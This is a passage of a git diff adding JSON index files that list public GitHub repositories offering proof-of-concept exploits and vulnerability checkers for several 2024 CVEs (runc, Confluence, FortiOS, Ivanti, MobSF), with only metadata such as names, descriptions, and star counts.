+ "html_url": "https:\/\/github.com\/laysakura\/CVE-2024-21626-demo",
+ "description": "Container Runtime Meetup #5 のLT用のデモ",
+ "fork": false,
+ "created_at": "2024-02-02T11:51:08Z",
+ "updated_at": "2024-04-17T13:23:55Z",
+ "pushed_at": "2024-02-02T14:33:19Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 753221669,
+ "name": "CVE-2024-21626-runcPOC",
+ "full_name": "V0WKeep3r\/CVE-2024-21626-runcPOC",
+ "owner": {
+ "login": "V0WKeep3r",
+ "id": 78677532,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78677532?v=4",
+ "html_url": "https:\/\/github.com\/V0WKeep3r"
+ },
+ "html_url": "https:\/\/github.com\/V0WKeep3r\/CVE-2024-21626-runcPOC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-02-05T17:47:01Z",
+ "updated_at": "2024-04-12T10:50:03Z",
+ "pushed_at": "2024-02-05T19:12:00Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 765630308,
+ "name": "CVE-2024-21626",
+ "full_name": "abian2\/CVE-2024-21626",
+ "owner": {
+ "login": "abian2",
+ "id": 156372457,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156372457?v=4",
+ "html_url": "https:\/\/github.com\/abian2"
+ },
+ "html_url": "https:\/\/github.com\/abian2\/CVE-2024-21626",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-01T09:58:50Z",
+ "updated_at": "2024-06-03T17:15:22Z",
+ "pushed_at": "2024-06-03T17:15:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 772512207,
+ "name": "CVE-2024-21626",
+ "full_name": "Sk3pper\/CVE-2024-21626",
+ "owner": {
+ "login": "Sk3pper",
+ "id": 13051136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13051136?v=4",
+ "html_url": "https:\/\/github.com\/Sk3pper"
+ },
+ "html_url": "https:\/\/github.com\/Sk3pper\/CVE-2024-21626",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-15T10:38:27Z",
+ "updated_at": "2024-05-15T10:16:16Z",
+ "pushed_at": "2024-03-17T21:43:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 781441452,
+ "name": "CVE-2024-21626",
+ "full_name": "KubernetesBachelor\/CVE-2024-21626",
+ "owner": {
+ "login": "KubernetesBachelor",
+ "id": 162622196,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162622196?v=4",
+ "html_url": "https:\/\/github.com\/KubernetesBachelor"
+ },
+ "html_url": "https:\/\/github.com\/KubernetesBachelor\/CVE-2024-21626",
+ "description": "POC",
+ "fork": false,
+ "created_at": "2024-04-03T11:45:19Z",
+ "updated_at": "2024-06-21T17:18:05Z",
+ "pushed_at": "2024-04-11T15:23:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 784647452,
+ "name": "cve-2024-21626",
+ "full_name": "dorser\/cve-2024-21626",
+ "owner": {
+ "login": "dorser",
+ "id": 20969462,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20969462?v=4",
+ "html_url": "https:\/\/github.com\/dorser"
+ },
+ "html_url": "https:\/\/github.com\/dorser\/cve-2024-21626",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-10T09:12:06Z",
+ "updated_at": "2024-05-01T19:07:43Z",
+ "pushed_at": "2024-04-16T18:47:57Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21633.json b/2024/CVE-2024-21633.json
new file mode 100644
index 0000000000..09f5250143
--- /dev/null
+++ b/2024/CVE-2024-21633.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 740220878,
+ "name": "CVE-2024-21633",
+ "full_name": "0x33c0unt\/CVE-2024-21633",
+ "owner": {
+ "login": "0x33c0unt",
+ "id": 26827438,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26827438?v=4",
+ "html_url": "https:\/\/github.com\/0x33c0unt"
+ },
+ "html_url": "https:\/\/github.com\/0x33c0unt\/CVE-2024-21633",
+ "description": "MobSF Remote code execution (via CVE-2024-21633)",
+ "fork": false,
+ "created_at": "2024-01-07T21:34:09Z",
+ "updated_at": "2024-06-25T11:13:08Z",
+ "pushed_at": "2024-01-07T21:34:51Z",
+ "stargazers_count": 70,
+ "watchers_count": 70,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 70,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21644.json b/2024/CVE-2024-21644.json
new file mode 100644
index 0000000000..3cdb90da6b
--- /dev/null
+++ b/2024/CVE-2024-21644.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 779492951,
+ "name": "CVE-2024-21644-Poc",
+ "full_name": "ltranquility\/CVE-2024-21644-Poc",
+ "owner": {
+ "login": "ltranquility",
+ "id": 118518854,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118518854?v=4",
+ "html_url": "https:\/\/github.com\/ltranquility"
+ },
+ "html_url": "https:\/\/github.com\/ltranquility\/CVE-2024-21644-Poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-30T01:00:31Z",
+ "updated_at": "2024-03-30T01:07:26Z",
+ "pushed_at": "2024-03-30T01:08:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21683.json b/2024/CVE-2024-21683.json
new file mode 100644
index 0000000000..9742ee47ed
--- /dev/null
+++ b/2024/CVE-2024-21683.json
@@ -0,0 +1,156 @@
+[
+ {
+ "id": 804651510,
+ "name": "-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server",
+ "full_name": "r00t7oo2jm\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server",
+ "owner": {
+ "login": "r00t7oo2jm",
+ "id": 90321909,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90321909?v=4",
+ "html_url": "https:\/\/github.com\/r00t7oo2jm"
+ },
+ "html_url": "https:\/\/github.com\/r00t7oo2jm\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server",
+ "description": "This vulnerability allows an unauthenticated attacker to remotely execute arbitrary code on a vulnerable Confluence server. The vulnerability exists due to an improper validation of user-supplied input in the Confluence REST API. This allows an attacker to inject malicious code into the Confluence server, which can then be executed by the server",
+ "fork": false,
+ "created_at": "2024-05-23T02:10:24Z",
+ "updated_at": "2024-05-23T02:10:24Z",
+ "pushed_at": "2024-05-22T22:15:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 804784650,
+ "name": "CVE-2024-21683-RCE",
+ "full_name": "W01fh4cker\/CVE-2024-21683-RCE",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-21683-RCE",
+ "description": "CVE-2024-21683 Confluence Post Auth RCE",
+ "fork": false,
+ "created_at": "2024-05-23T09:05:40Z",
+ "updated_at": "2024-06-25T13:29:21Z",
+ "pushed_at": "2024-05-27T03:47:36Z",
+ "stargazers_count": 112,
+ "watchers_count": 112,
+ "has_discussions": false,
+ "forks_count": 28,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "confluence",
+ "cve-2024-21683",
+ "redteam"
+ ],
+ "visibility": "public",
+ "forks": 28,
+ "watchers": 112,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 805211624,
+ "name": "-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server",
+ "full_name": "absholi7ly\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server",
+ "owner": {
+ "login": "absholi7ly",
+ "id": 72062217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4",
+ "html_url": "https:\/\/github.com\/absholi7ly"
+ },
+ "html_url": "https:\/\/github.com\/absholi7ly\/-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server",
+ "description": "This vulnerability could allow an attacker to take complete control of a vulnerable Confluence server. This could allow the attacker to steal data, modify data, or disrupt the availability of the server.",
+ "fork": false,
+ "created_at": "2024-05-24T05:38:18Z",
+ "updated_at": "2024-06-15T22:51:11Z",
+ "pushed_at": "2024-05-24T05:56:48Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806526029,
+ "name": "CVE-2024-21683-RCE",
+ "full_name": "phucrio\/CVE-2024-21683-RCE",
+ "owner": {
+ "login": "phucrio",
+ "id": 83689890,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83689890?v=4",
+ "html_url": "https:\/\/github.com\/phucrio"
+ },
+ "html_url": "https:\/\/github.com\/phucrio\/CVE-2024-21683-RCE",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-27T11:14:54Z",
+ "updated_at": "2024-05-27T11:26:45Z",
+ "pushed_at": "2024-05-27T11:26:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810286209,
+ "name": "CVE-2024-21683",
+ "full_name": "xh4vm\/CVE-2024-21683",
+ "owner": {
+ "login": "xh4vm",
+ "id": 87658711,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87658711?v=4",
+ "html_url": "https:\/\/github.com\/xh4vm"
+ },
+ "html_url": "https:\/\/github.com\/xh4vm\/CVE-2024-21683",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-04T12:00:00Z",
+ "updated_at": "2024-06-07T06:56:53Z",
+ "pushed_at": "2024-06-05T13:22:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-2169.json b/2024/CVE-2024-2169.json
new file mode 100644
index 0000000000..174dfa4662
--- /dev/null
+++ b/2024/CVE-2024-2169.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 776691365,
+ "name": "G3-Loop-DoS",
+ "full_name": "douglasbuzatto\/G3-Loop-DoS",
+ "owner": {
+ "login": "douglasbuzatto",
+ "id": 10249957,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10249957?v=4",
+ "html_url": "https:\/\/github.com\/douglasbuzatto"
+ },
+ "html_url": "https:\/\/github.com\/douglasbuzatto\/G3-Loop-DoS",
+ "description": "This Python script automates the process of scanning for systems potentially vulnerable to the Loop DoS attack and the hypothetical CVE-2024-2169 vulnerability. It focuses on scanning ports associated with protocols susceptible to denial-of-service (DoS) attacks. The script can be used for educational purposes or authorized penetration testing.",
+ "fork": false,
+ "created_at": "2024-03-24T07:53:52Z",
+ "updated_at": "2024-06-09T08:04:17Z",
+ "pushed_at": "2024-03-24T08:00:24Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21762.json b/2024/CVE-2024-21762.json
new file mode 100644
index 0000000000..e3cdcc1676
--- /dev/null
+++ b/2024/CVE-2024-21762.json
@@ -0,0 +1,212 @@
+[
+ {
+ "id": 764866619,
+ "name": "cve-2024-21762-check",
+ "full_name": "BishopFox\/cve-2024-21762-check",
+ "owner": {
+ "login": "BishopFox",
+ "id": 4523757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4523757?v=4",
+ "html_url": "https:\/\/github.com\/BishopFox"
+ },
+ "html_url": "https:\/\/github.com\/BishopFox\/cve-2024-21762-check",
+ "description": "Safely detect whether a FortiGate SSL VPN is vulnerable to CVE-2024-21762",
+ "fork": false,
+ "created_at": "2024-02-28T21:16:10Z",
+ "updated_at": "2024-06-19T23:59:14Z",
+ "pushed_at": "2024-06-14T16:18:32Z",
+ "stargazers_count": 90,
+ "watchers_count": 90,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 90,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 770363870,
+ "name": "CVE-2024-21762-Checker",
+ "full_name": "cleverg0d\/CVE-2024-21762-Checker",
+ "owner": {
+ "login": "cleverg0d",
+ "id": 108401157,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108401157?v=4",
+ "html_url": "https:\/\/github.com\/cleverg0d"
+ },
+ "html_url": "https:\/\/github.com\/cleverg0d\/CVE-2024-21762-Checker",
+ "description": "This script performs vulnerability scanning for CVE-2024-21762, a Fortinet SSL VPN remote code execution vulnerability. It checks whether a given server is vulnerable to this CVE by sending specific requests and analyzing the responses.",
+ "fork": false,
+ "created_at": "2024-03-11T12:28:05Z",
+ "updated_at": "2024-05-11T03:19:45Z",
+ "pushed_at": "2024-03-25T11:28:23Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 771422074,
+ "name": "CVE-2024-21762",
+ "full_name": "h4x0r-dz\/CVE-2024-21762",
+ "owner": {
+ "login": "h4x0r-dz",
+ "id": 26070859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4",
+ "html_url": "https:\/\/github.com\/h4x0r-dz"
+ },
+ "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-21762",
+ "description": "out-of-bounds write in Fortinet FortiOS CVE-2024-21762 vulnerability ",
+ "fork": false,
+ "created_at": "2024-03-13T09:17:28Z",
+ "updated_at": "2024-06-21T00:12:11Z",
+ "pushed_at": "2024-03-16T00:35:12Z",
+ "stargazers_count": 101,
+ "watchers_count": 101,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 101,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 771765194,
+ "name": "CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check",
+ "full_name": "r4p3c4\/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check",
+ "owner": {
+ "login": "r4p3c4",
+ "id": 111358086,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111358086?v=4",
+ "html_url": "https:\/\/github.com\/r4p3c4"
+ },
+ "html_url": "https:\/\/github.com\/r4p3c4\/CVE-2024-21762-Exploit-PoC-Fortinet-SSL-VPN-Check",
+ "description": "Chequea si tu firewall es vulnerable a CVE-2024-21762 (RCE sin autenticación)",
+ "fork": false,
+ "created_at": "2024-03-13T22:57:00Z",
+ "updated_at": "2024-05-30T14:29:21Z",
+ "pushed_at": "2024-03-24T22:01:21Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 773292574,
+ "name": "CVE-2024-21762",
+ "full_name": "d0rb\/CVE-2024-21762",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-21762",
+ "description": "The PoC demonstrates the potential for remote code execution by exploiting the identified security flaw.",
+ "fork": false,
+ "created_at": "2024-03-17T09:15:22Z",
+ "updated_at": "2024-05-28T01:22:54Z",
+ "pushed_at": "2024-03-17T09:20:35Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 781697452,
+ "name": "multicheck_CVE-2024-21762",
+ "full_name": "lolminerxmrig\/multicheck_CVE-2024-21762",
+ "owner": {
+ "login": "lolminerxmrig",
+ "id": 108659226,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108659226?v=4",
+ "html_url": "https:\/\/github.com\/lolminerxmrig"
+ },
+ "html_url": "https:\/\/github.com\/lolminerxmrig\/multicheck_CVE-2024-21762",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-03T21:42:55Z",
+ "updated_at": "2024-05-11T03:23:58Z",
+ "pushed_at": "2024-04-03T19:45:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 817578503,
+ "name": "cve-2024-21762-checker",
+ "full_name": "rdoix\/cve-2024-21762-checker",
+ "owner": {
+ "login": "rdoix",
+ "id": 59075479,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59075479?v=4",
+ "html_url": "https:\/\/github.com\/rdoix"
+ },
+ "html_url": "https:\/\/github.com\/rdoix\/cve-2024-21762-checker",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-20T02:58:02Z",
+ "updated_at": "2024-06-20T10:27:38Z",
+ "pushed_at": "2024-06-20T03:41:11Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21793.json b/2024/CVE-2024-21793.json
new file mode 100644
index 0000000000..717a09b81d
--- /dev/null
+++ b/2024/CVE-2024-21793.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 798058447,
+ "name": "CVE-2024-21793",
+ "full_name": "FeatherStark\/CVE-2024-21793",
+ "owner": {
+ "login": "FeatherStark",
+ "id": 42148584,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42148584?v=4",
+ "html_url": "https:\/\/github.com\/FeatherStark"
+ },
+ "html_url": "https:\/\/github.com\/FeatherStark\/CVE-2024-21793",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-09T02:31:13Z",
+ "updated_at": "2024-05-09T02:32:23Z",
+ "pushed_at": "2024-05-09T02:32:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-21887.json b/2024/CVE-2024-21887.json
new file mode 100644
index 0000000000..c4de3c041e
--- /dev/null
+++ b/2024/CVE-2024-21887.json
@@ -0,0 +1,247 @@
+[
+ {
+ "id": 743084274,
+ "name": "ivanti-CVE-2024-21887",
+ "full_name": "oways\/ivanti-CVE-2024-21887",
+ "owner": {
+ "login": "oways",
+ "id": 11142952,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11142952?v=4",
+ "html_url": "https:\/\/github.com\/oways"
+ },
+ "html_url": "https:\/\/github.com\/oways\/ivanti-CVE-2024-21887",
+ "description": "POC Checker for ivanti CVE-2024-21887 Command injcetion",
+ "fork": false,
+ "created_at": "2024-01-14T09:25:56Z",
+ "updated_at": "2024-05-10T02:50:53Z",
+ "pushed_at": "2024-01-14T09:27:36Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 744186376,
+ "name": "CVE-2023-46805_CVE-2024-21887",
+ "full_name": "duy-31\/CVE-2023-46805_CVE-2024-21887",
+ "owner": {
+ "login": "duy-31",
+ "id": 20819326,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4",
+ "html_url": "https:\/\/github.com\/duy-31"
+ },
+ "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-46805_CVE-2024-21887",
+ "description": "An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.",
+ "fork": false,
+ "created_at": "2024-01-16T19:40:59Z",
+ "updated_at": "2024-06-14T17:17:06Z",
+ "pushed_at": "2024-01-17T19:14:09Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 744213825,
+ "name": "CVE-2024-21887",
+ "full_name": "Chocapikk\/CVE-2024-21887",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-21887",
+ "description": "A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.",
+ "fork": false,
+ "created_at": "2024-01-16T20:59:38Z",
+ "updated_at": "2024-06-25T13:56:06Z",
+ "pushed_at": "2024-01-17T00:38:28Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 745015590,
+ "name": "CVE-2023-46805_CVE-2024-21887",
+ "full_name": "raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887",
+ "owner": {
+ "login": "raminkarimkhani1996",
+ "id": 26582031,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26582031?v=4",
+ "html_url": "https:\/\/github.com\/raminkarimkhani1996"
+ },
+ "html_url": "https:\/\/github.com\/raminkarimkhani1996\/CVE-2023-46805_CVE-2024-21887",
+ "description": "The script in this repository only checks whether the vulnerabilities specified in the Ivanti Connect Secure product exist.",
+ "fork": false,
+ "created_at": "2024-01-18T13:25:46Z",
+ "updated_at": "2024-04-30T02:04:11Z",
+ "pushed_at": "2024-03-23T14:52:22Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745284788,
+ "name": "Ivanti-Connect-Around-Scan",
+ "full_name": "seajaysec\/Ivanti-Connect-Around-Scan",
+ "owner": {
+ "login": "seajaysec",
+ "id": 7016191,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7016191?v=4",
+ "html_url": "https:\/\/github.com\/seajaysec"
+ },
+ "html_url": "https:\/\/github.com\/seajaysec\/Ivanti-Connect-Around-Scan",
+ "description": "Mitigation validation utility for the Ivanti Connect Around attack chain. Runs multiple checks. CVE-2023-46805, CVE-2024-21887.",
+ "fork": false,
+ "created_at": "2024-01-19T02:12:11Z",
+ "updated_at": "2024-04-05T07:44:30Z",
+ "pushed_at": "2024-02-03T01:59:49Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745384269,
+ "name": "CVE-2023-46805_CVE-2024-21887_scan_grouped",
+ "full_name": "mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped",
+ "owner": {
+ "login": "mickdec",
+ "id": 33021266,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33021266?v=4",
+ "html_url": "https:\/\/github.com\/mickdec"
+ },
+ "html_url": "https:\/\/github.com\/mickdec\/CVE-2023-46805_CVE-2024-21887_scan_grouped",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-19T08:11:31Z",
+ "updated_at": "2024-05-21T12:56:29Z",
+ "pushed_at": "2024-05-21T12:56:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745995423,
+ "name": "CVE-2024-21887",
+ "full_name": "tucommenceapousser\/CVE-2024-21887",
+ "owner": {
+ "login": "tucommenceapousser",
+ "id": 129875733,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4",
+ "html_url": "https:\/\/github.com\/tucommenceapousser"
+ },
+ "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2024-21887",
+ "description": "exploit for ivanti",
+ "fork": false,
+ "created_at": "2024-01-20T19:15:23Z",
+ "updated_at": "2024-06-06T13:41:03Z",
+ "pushed_at": "2024-01-20T19:20:25Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
